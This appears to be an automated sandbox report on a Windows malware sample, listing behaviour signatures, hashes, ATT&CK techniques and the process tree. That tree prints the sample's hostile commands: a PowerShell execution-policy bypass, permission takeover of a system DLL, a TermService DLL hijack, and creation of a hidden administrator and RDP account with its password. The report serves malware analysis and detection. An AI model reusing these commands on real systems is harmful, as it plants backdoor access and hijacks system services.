Analysis

  • max time kernel
    155s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    09-03-2022 15:18

General

  • Target

    6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe

  • Size

    2.2MB

  • MD5

    f8c8ebd884d22e0866c217d24c16042f

  • SHA1

    0b9a6f2e1d735dae6f979c4bb357b565614b721d

  • SHA256

    6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba

  • SHA512

    3114b0e3984f6d566378a7dcda39ab6f48da57b71462f283e28d94e980b85d93f5a4e84ab74e3a83e90f8f148a768684fd45585fd7844207f448baeb93bc4787

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe
    "C:\Users\Admin\AppData\Local\Temp\6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1180
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c wscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1556
      • C:\Windows\system32\wscript.exe
        wscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:696
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\reactor.txt reactor.ps1& powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1040
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps1
            5⤵
            • Deletes itself
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:392
            • C:\Windows\system32\takeown.exe
              "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1764
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1776
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:1100
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:2012
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:2028
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1392
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1908
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:480
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\servicedll.dll /f
              6⤵
              • Modifies registry key
              PID:1952
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:912
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                7⤵
                  PID:1700
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                6⤵
                  PID:1760
      • C:\Windows\System32\cmd.exe
        cmd /C net.exe user wgautilacc By9zqDdC /add
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\system32\net.exe
          net.exe user wgautilacc By9zqDdC /add
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1736
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user wgautilacc By9zqDdC /add
            3⤵
              PID:764
        • C:\Windows\System32\cmd.exe
          cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1072
          • C:\Windows\system32\net.exe
            net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1396
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
              3⤵
                PID:876
          • C:\Windows\System32\cmd.exe
            cmd /C net.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:1556
            • C:\Windows\system32\net.exe
              net.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1164
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD
                3⤵
                  PID:1660
            • C:\Windows\System32\cmd.exe
              cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
              1⤵
                PID:1116
                • C:\Windows\system32\net.exe
                  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                  2⤵
                    PID:848
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                      3⤵
                        PID:1764
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user wgautilacc By9zqDdC
                    1⤵
                      PID:1100
                      • C:\Windows\system32\net.exe
                        net.exe user wgautilacc By9zqDdC
                        2⤵
                          PID:772
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 user wgautilacc By9zqDdC
                            3⤵
                              PID:1244

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Persistence

                        Account Manipulation

                        1
                        T1098

                        Registry Run Keys / Startup Folder

                        1
                        T1060

                        Defense Evasion

                        Modify Registry

                        2
                        T1112

                        File Permissions Modification

                        1
                        T1222

                        Discovery

                        System Information Discovery

                        1
                        T1082

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\9887742.txt
                          MD5

                          f63cb26ded5c82a6c82e5160933da4ed

                          SHA1

                          9ae96ecea3c6c56a6e67e672cf9422d7427c04ff

                          SHA256

                          7788a48c713d87538bedf7907733b03eb72d3682004b4d1795d0e6eb1b494f4c

                          SHA512

                          985cbe9af1b9539eb5b67eef4b78bd7581247f3a4b7e4c3ecd6ced3694d9c56814dfd9a866797aa3edeebe68dc07f35513fd62b804d5a0c5699288c9b37adbab

                        • C:\Users\Admin\AppData\Local\Temp\changelog_66663.txt
                          MD5

                          a97cf439052cb972928acb8d809f9edc

                          SHA1

                          2bb935b6b2cf883315eacf3efec2b94bc1054961

                          SHA256

                          9fed878f994d4778d1ee922ee0c7478cadfb16a119aa93e4e3e8fa555e9d4547

                          SHA512

                          e861d95e20fd989080349e2257604fde204fda4090fac9d0f2fc413efc7731855a66b0342b902e373908fccb9f85f6777bcf1530d585d6e5bdfdd64e1809c907

                        • C:\Users\Admin\AppData\Local\Temp\changes_765543.txt
                          MD5

                          4a6f27efae09ab64d0735d1c10d79b3e

                          SHA1

                          8d72ddb83235b8b8632e7e9f8df91f566d3c73c6

                          SHA256

                          0516aa8b986ed03badaf0c7a0db833ab64437900d82a833e22ca4d2715bfc58f

                          SHA512

                          df1ef0fe044bb6c6e37b07676851cca3b0a849e52e8bfee79e04c0af1d5383862d5e9e17ab5e1c102d31caec84fbf9afa4121c2f89453c21aac8aebd761524b4

                        • C:\Users\Admin\AppData\Local\Temp\install_455111.log
                          MD5

                          0c34e2096fc530535d1fb38b8e9f68a6

                          SHA1

                          ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a

                          SHA256

                          fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb

                          SHA512

                          0b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf

                        • C:\Users\Admin\AppData\Local\Temp\log_455111.txt
                          MD5

                          2c50ffba8c7d98a9cb5fec3c2a6913df

                          SHA1

                          849b62f4911551b69cab9bc5ca6cf1af7ca28fc0

                          SHA256

                          f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0

                          SHA512

                          7d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750

                        • C:\Users\Admin\AppData\Local\Temp\reactor.txt
                          MD5

                          c2a9670c6617c3acc5cc5099b1437e42

                          SHA1

                          6a83468dcaf55f74cd46fdf280ed8f354e6d93eb

                          SHA256

                          c5b725434a92709e3bf65d44b5cb25712a2140141facb54396e25b29933c7b95

                          SHA512

                          d2c789f800cae8420b36380155a5d1566b7bed9f2a609b739dee4d20064e7770efd48303000f0ee6aa79340d73b7557223af885ffc78aa32a7c372d04e2903a1

                        • C:\Users\Admin\AppData\Local\Temp\reactor.vbs
                          MD5

                          c0a65d8cb9b5db7fdc9a178f8c80102d

                          SHA1

                          733f50a72526784a61aaf77e5cddf13f904c1693

                          SHA256

                          a55d04242cc9381741621d2918accce8fb9c4b8307013c9f828cacdd1d4895c2

                          SHA512

                          36dc712d8a926c6a7bc4257345261ea0b7154daa97735123007e903cdb732ebf2fe0c3358f00b6b500cdccceecbc130cbc3f4a2a2a4f09974bcca8dc93ed4539

                        • C:\Users\Admin\AppData\Local\Temp\readme_455111.txt
                          MD5

                          c1bf275bca659ad1cf0bd5c6d04cec7a

                          SHA1

                          122d241329bffafc75d3e1e43e993d22d8180f41

                          SHA256

                          c6e7c51172f2094e7240c3415681bd3836cf18a6260e184798986787396ed435

                          SHA512

                          8a5e635ba906248406f392d9dfe9e11c5776d6c349097d641bd672968ea35a360ab7eb5062279307ba7864e44ee18f4dbc11e518a469a592fb8d18fca71baeaf

                        • C:\Windows\system32\rfxvmt.dll
                          MD5

                          dc39d23e4c0e681fad7a3e1342a2843c

                          SHA1

                          58fd7d50c2dca464a128f5e0435d6f0515e62073

                          SHA256

                          6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                          SHA512

                          5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                        • \??\PIPE\lsarpc
                          MD5

                          d41d8cd98f00b204e9800998ecf8427e

                          SHA1

                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                          SHA256

                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                          SHA512

                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                        • \??\PIPE\samr
                          MD5

                          d41d8cd98f00b204e9800998ecf8427e

                          SHA1

                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                          SHA256

                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                          SHA512

                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                        • \??\PIPE\samr
                          MD5

                          d41d8cd98f00b204e9800998ecf8427e

                          SHA1

                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                          SHA256

                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                          SHA512

                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                        • \??\PIPE\samr
                          MD5

                          d41d8cd98f00b204e9800998ecf8427e

                          SHA1

                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                          SHA256

                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                          SHA512

                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                        • \??\PIPE\samr
                          MD5

                          d41d8cd98f00b204e9800998ecf8427e

                          SHA1

                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                          SHA256

                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                          SHA512

                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                        • \Users\Admin\AppData\Local\Temp\nsyEEB3.tmp\System.dll
                          MD5

                          fbe295e5a1acfbd0a6271898f885fe6a

                          SHA1

                          d6d205922e61635472efb13c2bb92c9ac6cb96da

                          SHA256

                          a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

                          SHA512

                          2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

                        • \Windows\Help\lababa.bin
                          MD5

                          ffa52c8fbd121f416f27f18bd2d0ad7f

                          SHA1

                          08255a80df87379c303fb39aabc579ef1c09b037

                          SHA256

                          f61fdfc36ee70147d7639f9d2dc25dd42353652d390961b3727ea990d7ef4b05

                          SHA512

                          b8db846d9a8bf8561c0f81dea143253d55f4d94543a668eb6fa47a7c86e83845c5734f6a0706a6c9a742cf7fd2dcc971ac01ea223b7270928de4b218da775cb5

                        • \Windows\Help\servicedll.dll
                          MD5

                          def5e867485841d1f2f53db3f0407514

                          SHA1

                          1fdfa582b37f4c0c06a998532856a89581a5fea0

                          SHA256

                          25de2f4ca48b55ba403b08d94d64e97b5582fa76b51b9ac8e7bcaae111e04dfc

                          SHA512

                          c470af48a66507dacf5129f0ae7d68df859443e2cb709a507fe6b23be1ff52ca9ded878adcb60997544e9227022d7dbc8bd91b89fa33a30eef8effb1d6dbaf43

                        • memory/392-67-0x000000000229B000-0x00000000022BA000-memory.dmp
                          Filesize

                          124KB

                        • memory/392-66-0x000000001B930000-0x000000001BC2F000-memory.dmp
                          Filesize

                          3.0MB

                        • memory/392-61-0x000007FEF2FA0000-0x000007FEF3AFD000-memory.dmp
                          Filesize

                          11.4MB

                        • memory/392-64-0x0000000002292000-0x0000000002294000-memory.dmp
                          Filesize

                          8KB

                        • memory/392-65-0x0000000002294000-0x0000000002297000-memory.dmp
                          Filesize

                          12KB

                        • memory/392-63-0x0000000002290000-0x0000000002292000-memory.dmp
                          Filesize

                          8KB

                        • memory/392-62-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
                          Filesize

                          9.6MB

                        • memory/696-58-0x000007FEFBD71000-0x000007FEFBD73000-memory.dmp
                          Filesize

                          8KB

                        • memory/1180-55-0x0000000075831000-0x0000000075833000-memory.dmp
                          Filesize

                          8KB